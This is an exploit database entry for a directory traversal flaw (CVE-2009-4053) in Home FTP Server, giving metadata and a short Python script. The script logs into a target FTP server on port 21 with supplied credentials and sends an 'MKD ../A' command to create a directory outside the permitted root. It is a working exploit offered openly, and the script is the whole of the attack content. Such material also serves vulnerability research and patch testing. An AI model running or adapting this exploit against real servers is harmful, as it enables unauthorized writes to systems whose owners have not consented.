[] NeoSense

Home FTP Server - 'MKD' Directory Traversal

Author: zhangmc
type: remote
platform: windows
port: 21.0
date_added: 2009-11-16 
date_updated:  
verified: 1 
codes: CVE-2009-4053;OSVDB-60449 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comHomeFtpServerInstall.exe

#!/usr/bin/python
import socket
import sys

def Usage():
    print ("Usage:  ./expl.py <serv_ip>      <Username> <password>\n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
        Usage()
        sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    sock.send("MKD ../A\r\n")
    sock.close()
    sys.exit(0);